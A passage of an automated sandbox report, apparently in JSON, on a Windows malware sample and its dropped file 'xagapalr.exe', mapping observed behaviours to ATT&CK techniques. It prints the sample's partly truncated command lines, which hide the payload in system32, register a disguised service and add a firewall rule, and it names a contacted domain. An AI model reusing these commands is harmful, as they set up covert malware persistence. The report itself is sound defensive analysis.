\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xagapalr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xagapalr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\iemwdxzd\\\\\" (UID: 00000000-00003608)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\xagapalr.exe\" %WINDIR%\\\\system32\\\\iemwdxzd\\\\\" (UID: 00000000-00003944)\n Spawned process \"sc.exe\" with commandline \"create iemwdxzd binPath= \"%WINDIR%\\\\system32\\\\iemwdxzd\\\\xagapalr ...\" (UID: 00000000-00004412), Spawned process \"sc.exe\" with commandline \"description iemwdxzd \"wifi internet conection\"\" (UID: 00000000-00003148), Spawned process \"sc.exe\" with commandline \"start iemwdxzd\" (UID: 00000000-00004100), Spawned process \"xagapalr.exe\" with commandline \"/d\"C:\\\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13 ...\" (UID: 00000000-00004084)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00000600), Spawned process \"svchost.exe\" (UID: 00000000-00004440)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\iemwdxzd\\\\\" (UID: 00000000-00003608)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\xagapalr.exe\" %WINDIR%\\\\system32\\\\iemwdxzd\\\\\" (UID: 00000000-00003944)\n Spawned process \"sc.exe\" with commandline \"create iemwdxzd binPath= \"%WINDIR%\\\\system32\\\\iemwdxzd\\\\xagapalr ...\" (UID: 00000000-00004412), Spawned process \"sc.exe\" with commandline \"description iemwdxzd \"wifi internet conection\"\" (UID: 00000000-00003148), Spawned process \"sc.exe\" with commandline \"start iemwdxzd\" (UID: 00000000-00004100), Spawned process \"xagapalr.exe\" with commandline \"/d\"C:\\\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13 ...\" (UID: 00000000-00004084)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00000600), Spawned process \"svchost.exe\" (UID: 00000000-00004440)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"xagapalr.exe\" (UID: 00000000-00004084) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"xagapalr.exe\" (UID: 00000000-00004084) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00000600) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00000600) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00004440) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00004440) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xagapalr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"xagapalr.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"xagapalr.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"xagapalr.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"xagapalr.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has an executable section named \".text\"\n \"xagapalr.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has an writable section named \".data\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has an writable section named \".text\"\n \"xagapalr.exe\" has an writable section named \".data\"\n \"xagapalr.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xc76000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xc3a000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"xagapalr.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" was detected as \"VC8 -> Microsoft Corporation\"\n \"xagapalr.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"xagapalr.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\xagapalr.exe]- [targetUID: 00000000-00003944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"xagapalr.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" reads file \"c:\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe.Local\\\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\3FEE4A0C6C66BE70F7A2C21962CDBA3F0FA8AE23DFBCD0B78F6778A13E15CE0A.EXE.LOCAL\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\xagapalr.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: 